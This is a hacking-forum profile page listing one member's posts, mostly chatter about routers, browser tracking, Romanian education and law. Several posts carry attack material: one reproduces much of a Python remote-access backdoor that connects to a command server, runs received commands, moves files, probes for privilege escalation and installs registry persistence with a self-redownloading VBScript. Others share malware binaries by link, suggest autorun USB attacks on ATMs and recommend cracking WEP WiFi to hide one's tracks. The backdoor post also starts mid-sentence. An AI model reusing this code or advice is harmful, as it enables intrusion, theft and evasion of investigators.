MadAgent

Active Members | Posts: 97 | Days Won: 1

Everything posted by MadAgent

  1. If you only want to serve it over cable, I think you can do it with any router that supports DD-WRT; if you also want wireless and you like modding, you can start building something with a Raspberry; and a relatively cheap out-of-the-box solution would be the pineapple.
  2. I hope I haven't posted in the wrong section and that it helps those of you who want to reverse it. It's an SSH bruteforcer as far as I could tell; it connects to a C&C (I think it's not an IRCD). Unfortunately, at the time of testing, the connection to the C&C times out. The same binary for several processors - x32, x64, arm, mips, ... Link: https://www.sendspace.com/file/54jyoj
  3. Over time, I have found a number of IPs that I personally usually block on certain servers; some belong to security companies, others to government institutions, and the rest are honeypots run by various individuals or legal entities of no renown. Some of the IPs were taken from the "deceased" ryan a long time ago. If you have found others too and want to share, post them and I'll add them to the main list. P.S. If it should be in another section, please move it.
  4. Nice, but it still doesn't uniquely identify you; it fits you into a pattern... If I also used that browser for everyday things, or if I went out directly with my home address, or logged into personal accounts, GLUGA could find me by user behaviour. Anyway, if you pull stunts and they want to find you, they download something with a 0day onto your machine and turn on your camera, take the serial numbers of your components and "the whole lot" (if they got it into the New York Times, I think they could get it into other sites too).
  5. Compromises... maybe he figured that, for servicing, there won't be room behind the ATM (e.g. ATMs in shops - they are common abroad) with a laptop or other equipment (or so as not to take the whole contraption apart; there are ATMs that open from the front - http://www.extremetech.com/wp-content/uploads/2013/12/Two_Loomis_Employees_Refilling_an_ATM_at_the_Downtown_Seattle_REI.jpg).
  6. Identification is done by IP and UserAgent: $etag = substr(sha1($secret . sha1($_SERVER["REMOTE_ADDR"]) . sha1($_SERVER["HTTP_USER_AGENT"])), 0, 18); For now, if you change IP + delete cookies + clear the cache you are protected (at least from the public methods); of course there may be applets or other crazy things signed by certain authorities through which hardware serial numbers can be seen, but that's life. Off-topic: If you want to be invisible, leave technology at home and go into an underground bunker 50-100m deep (it doesn't work any more even if you're in the forest, they'll find you by your heartbeat rhythm).
  7. Unfortunately, some ATMs have a USB port on the front (some under the keypad). You can take off the keypad and plug in a stick with autorun, or if autorun is disabled but it has a default admin code, you can find a way to run... Off-topic: Two-bit technologies are adopted for payments only because people have been taught (deliberately by the "system", or carried along by the wave of technologization) to use them and have too little information to realize what they are exposing themselves to.
  8. If it has the webpage in another dir, or if someone else has rights on the directory, the file can't be written. If it has iptables up, no port gets opened. Ping is rarely blocked from iptables, and usually incoming is blocked, not outgoing, so this is the safest way.
  9. AdyRo, as the name says, you have to put an IP in place of Google. Use the posted version...
  10. Well, that's about it, but from tests I saw that for certain geo locations of the server it still puts h3; the rest of the changes are made for my own needs...
  11.
        #!/bin/bash
        # Based on bing-ip2hosts v4 by Andrew Horton aka urbanadventurer, MorningStar Security
        # Modified by MadAgent on August 2014, released for RST Forums
        # Saves results to 'hosts' file

        VERSION=0.5
        TMPDIR=./tmp
        ANIMATION=0
        OUTPUTIP=1
        HTTPPREFIX=0
        IP=
        PREFIX=
        DEBUG=0

        rm -rf hosts > /dev/null 2>&1

        if [ -z "$1" ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then
            echo -e "
        OPTIONS are:
        -n\t\tTurn off the progress indicator animation
        -t <DIR>\tUse this directory instead of /tmp. The directory must exist.
        -i\t\tOptional CSV output. Outputs the IP and hostname on each line, separated by a comma.
        -p\t\tOptional http:// prefix output. Useful for right-clicking in the shell.
        "
            exit 1
        fi

        while getopts "nipt:" optionName; do
            case "$optionName" in
                n) ANIMATION=0;;
                t) TMPDIR="$OPTARG";;
                i) OUTPUTIP=1;;
                p) HTTPPREFIX=1;;
                [?]) echo "Error"; exit 1;;
            esac
        done
        shift $(($OPTIND -1))

        if [ -z "$1" ]; then
            echo "need an IP or hostname"
            exit 1
        fi

        animation="/-\|"
        page=0
        last_page_check=
        how_many=1
        uniq_hosts=0
        single_page=

        # if the parameter looks like an IP go ahead, otherwise resolve it
        if [ `echo "$1" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
            IP="$1"
        else
            # IP=`resolveip -s "$1"`
            IP=`nslookup "$1" |egrep "^Address: \w+\.\w+\.\w+\.\w+$"|tail -1|awk '{ print $2 }'`
            # dig -t a treshna.com +short
            if [ "$IP" == "" ]; then
                echo "Error: cannot resolve $1 to an IP"
                exit 1
            fi
        fi

        all_hosts=`mktemp -p "$TMPDIR" -t bing-ip2hosts.tmp.XXXXXX`

        while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
            if [ $ANIMATION == 1 ]; then
                echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
                echo -en "[ $IP | Scraping $how_many | Found $uniq_hosts | ${animation: $(( $page % 4 )) :1} ]"
            fi

            url="http://www.bing.com/search?q=ip%3A$IP&go=&qs=n&first=${page}0&FORM=PERE"
            out=`mktemp -p "$TMPDIR" -t bing-ip2hosts.tmp.XXXXXX`
            wget -q -O "$out" "$url"

            # string emptiness is tested with -z (-eq is an arithmetic comparison)
            last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' "$out"`
            if [[ -z "$last_page_check" ]]; then
                last_page_check=`egrep -o '<span class="sb_count">[0-9]+-([0-9]+) of (\1)' "$out"`
            fi
            if [ "$DEBUG" -eq 1 ]; then
                echo "Last Page Check: $last_page_check"
            fi

            # if no results are found, how_many is empty and the loop will exit
            how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' "$out"|cut -d '>' -f 2|cut -d ' ' -f 1-3`
            if [[ -z "$how_many" ]]; then
                how_many=`egrep -o '<span class="sb_count">[^<]+' "$out"|cut -d '>' -f 2|cut -d ' ' -f 1-3`
            fi

            # check for a single page of results
            single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' "$out"`
            if [[ -z "$single_page" ]]; then
                single_page=`egrep -o '<span class="sb_count">[0-9] ' "$out"`
            fi
            if [ $DEBUG -eq 1 ]; then
                echo "Single Page: $single_page"
            fi

            # no captcha support or detection
            # pages will contain "Typing the characters in the picture above helps us ensure that a person, not a program, is performing a search"
            vhosts=`egrep -o "<h3><a href=\"[^\"]+" "$out" |cut -d '"' -f 2`
            if [[ -z "$vhosts" ]]; then
                vhosts=`egrep -o "<h2><a href=\"[^\"]+" "$out" |cut -d '"' -f 2`
            fi
            echo -e "$vhosts" >> "$all_hosts"

            uniq_hosts=`cat "$all_hosts" | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sort | uniq | wc -l`
            if [ $DEBUG -eq 0 ]; then
                rm -f "$out"
            fi
            let page=$page+1
            if [ $DEBUG -eq 1 ]; then
                echo "Page: $page"
            fi
        done

        if [ $ANIMATION == 1 ]; then
            echo
        fi

        __NSLOOKUP="$(which nslookup)"
        __HOST="$(which host)"
        if [[ "$__NSLOOKUP" != "" ]]; then
            echo -e "$($__NSLOOKUP $IP | grep name | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts"
        fi
        if [[ "$__HOST" != "" ]]; then
            echo -e "$($__HOST $IP | grep -v 'not found' | grep name | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts"
        fi
        echo -e "$(host $IP | grep -v 'not found' | awk '{ print $NF }' | sed 's/\.$//' | sed 's/ //g')" >> "$all_hosts"

        uniq_hosts=`cat "$all_hosts" | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sort | uniq`
        if [ $DEBUG -eq 0 ]; then
            rm -f "$all_hosts"
        fi

        if [ $OUTPUTIP == 1 ]; then
            PREFIX="$IP,"
        fi
        if [ $HTTPPREFIX == 1 ]; then
            PREFIX="$PREFIX""http://"
        fi

        for h in `echo "$uniq_hosts"`
        do
            echo "$PREFIX$h" >> hosts
        done
  12. Login bypass Exploit -> you can execute commands by sending parameters via POST or GET. Example: SyRiAn Electronic Army Shell :: SEA Shell Bypass: SyRiAn Electronic Army Shell :: SEA Shell You can also see the control panel, so you no longer have to bother going at it like Dorel through GET and POST...
  13. I think it's a variation of https://towelroot.com
  14. I thought for a while about whether to post it or not. Since I found it anyway, I uploaded it here: https://www.sendspace.com/file/hs4v1o I don't know if it's any good, I didn't really have time for it today. If anyone has the time/inclination to test it, leave some feedback too.
  15. Because education in Romania is a wreck, because school here teaches you nothing, because in a halfway civilized country the emphasis should be on what you know, not on what piece of toilet paper you put on the table, because today on chat people were talking about bribes for the BAC, because I just saw this and it struck me what kind of world we live in, because I can, because I rarely post on the forum, to pull you out of the monotony.
  16. It seems that universities in Romania have started to follow the model of those in civilized countries. Relying on the idea that there is no such thing as negative publicity, ASE is getting itself free publicity in several Romanian tabloids. Vice-dean of the Faculty of Finance and Banking at ASE, detained for taking bribes from students - Mediafax
  17. If it works on the same principle as [APP][ROOT][WiFi] Reaver-GUI for Android - xda-developers, you may need cyanogenmod. Only certain phones are supported.
  18. Maybe someone can learn something from it. The C&C was down when I checked. I liked how it checks privileges and, more than that, that it sends the data encrypted. Thanks to @Echo %a >> p1.txt')

            xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" >> p2.txt')
            time.sleep(40)
            ap = 0
            bp = 0
            dp = open('p2.txt')
            lines = dp.readlines()
            for line in lines:
                cp = 0
                while cp < len(permatch):
                    j = line.find(permatch[cp])
                    if j != -1:
                        if permbool == False:
                            privinfo += 'The following directories have write access:\n\n'
                            permbool = True
                        bp = ap
                        while True:
                            if len(lines[bp].split('\\')) > 2:
                                while bp <= ap:
                                    privinfo += lines[bp]
                                    bp += 1
                                break
                            else:
                                bp -= 1
                    cp += 1
                ap += 1
            time.sleep(4)
            if permbool == True:
                privinfo += '\nReplace executable with Python shell.\n'
            if permbool == False:
                privinfo += '\nNo directories with misconfigured premissions found.\n'
            dp.close()
            xv = Exec('del p1.txt')
            xv = Exec('del p2.txt')
            return privinfo

        def Persist(sock, redown=None, newdir=None):
            if os.name == 'nt':
                privscheck = Exec('reg query "HKU\S-1-5-19" | find "error"')
                if privscheck != '':
                    return "You must be authority\system to enable persistence.\n"
                else:
                    exedir = os.path.join(sys.path[0], sys.argv[0])
                    exeown = exedir.split('\\')[-1]
                    vbsdir = os.getcwd() + '\\' + 'hkcmds.vbs'
                    if redown == None:
                        vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n'
                    else:
                        if newdir == None:
                            newdir = exedir
                            newexe = exeown
                        else:
                            newexe = newdir.split('\\')[-1]
                        vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 : wscript.sleep(1000) : loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n'
                    vbs = open('hkcmds.vbs', 'wb')
                    vbs.write(vbscript)
                    vbs.close()
                    persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v hkcmds /t REG_SZ /d "' + vbsdir + '"')
                    persist += '\nPersistence complete.\n'
                    return persist

        def Exec(cmde):
            if cmde:
                execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                cmdoutput = execproc.stdout.read() + execproc.stderr.read()
                return cmdoutput
            else:
                return "Enter a command.\n"

        while True:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((HOST, PORT))
                cipher = AES.new(secret,AES.MODE_CFB)
                data = Receive(s)
                if data == 'Activate':
                    active = True
                    Send(s, "\n"+os.getcwd()+">")
                while active:
                    data = Receive(s)
                    if data == '':
                        time.sleep(0.02)
                    if data == "quit" or data == "terminate":
                        Send(s, "quitted")
                        break
                    elif data.startswith("cd ") == True:
                        try:
                            os.chdir(data[3:])
                            stdoutput = ""
                        except:
                            stdoutput = "Error opening directory.\n"
                    elif data.startswith("download") == True:
                        stdoutput = Upload(s, data[9:])
                    elif data.startswith("downhttp") == True:
                        stdoutput = Downhttp(s, data[9:])
                    elif data.startswith("upload") == True:
                        stdoutput = Download(s, data[7:])
                    elif data.startswith("privs") == True:
                        stdoutput = Privs(s)
                    elif data.startswith("persist") == True:
                        if len(data.split(' ')) == 1:
                            stdoutput = Persist(s)
                        elif len(data.split(' ')) == 2:
                            stdoutput = Persist(s, data.split(' ')[1])
                        elif len(data.split(' ')) == 3:
                            stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])
                    else:
                        stdoutput = Exec(data)
                    stdoutput = stdoutput+"\n"+os.getcwd()+">"
                    Send(s, stdoutput)
                if data == "terminate":
                    break
                time.sleep(3)
            except socket.error:
                s.close()
                time.sleep(10)
                continue
  19. I said what I wanted in the question; if I had wanted someone to help me with something, I would probably have posted in Help, not in Off-topic. I wanted to see whether anyone had come across it so far.
  20. Whether anyone made it or anyone used it. If it's one of the 2 options, you realize anyway that you're not blind... Or didn't it grate on your eyes 10 years ago when you saw "Toata dragostea mea pentru diavola".
  21. Has anyone seen this (or did anyone here make it)? System.out.println("[+] thaGod's private SSH bruteforce tool ;)"); System.out.println("[+] Scanning : " + arg[0] + " class"); Is something like this still used?
  22. If we didn't live in Romania, it would be rather hard to do that. If my intuition is right, the punishment can't be changed if you received your sentence under the old criminal code. Just as, from a legal point of view, it's impossible to be charged under a law that appeared after you committed the act (e.g. today I drive on DN1 and tomorrow I'm no longer allowed to; I don't get a fine for driving today, only if I drive again tomorrow; a tax on breathing is introduced from tomorrow - you pay from tomorrow, not from when I was born).
  23. MadAgent

    www1 / www

    Of course it works. You point your domain and the alias (www) to one IP, and the subdomain (or www1) to another IP.
  24. Nice tutorial. Still, I wouldn't use TOR. As far as I know, not only does the American government fund the project, but they also caught the owner of SilkRoad, an owner who had thought things through well with TOR, anonymity, 10,000 layers etc. Instead of TOR, I think the tunnel-in-tunnel solution over SSH (chaining tunnels) would be better. And more importantly: don't do the setup from home. Go like a regular guy to a bar with WIFI or to the student dorms and crack a WiFi with WEP (it takes exactly 10 minutes and there are plenty who still have WEP). Sit calmly with a coffee and the laptop in front of you (in the bar - also put on dress trousers and a shirt) or on the curb with the laptop and a beer (at the dorms - shorts, no T-shirt), look as natural as possible. And after I posted I saw that you were talking about MITM, but better that some guy finds out you made yourself a VPN account than that the ones I don't want to find out do.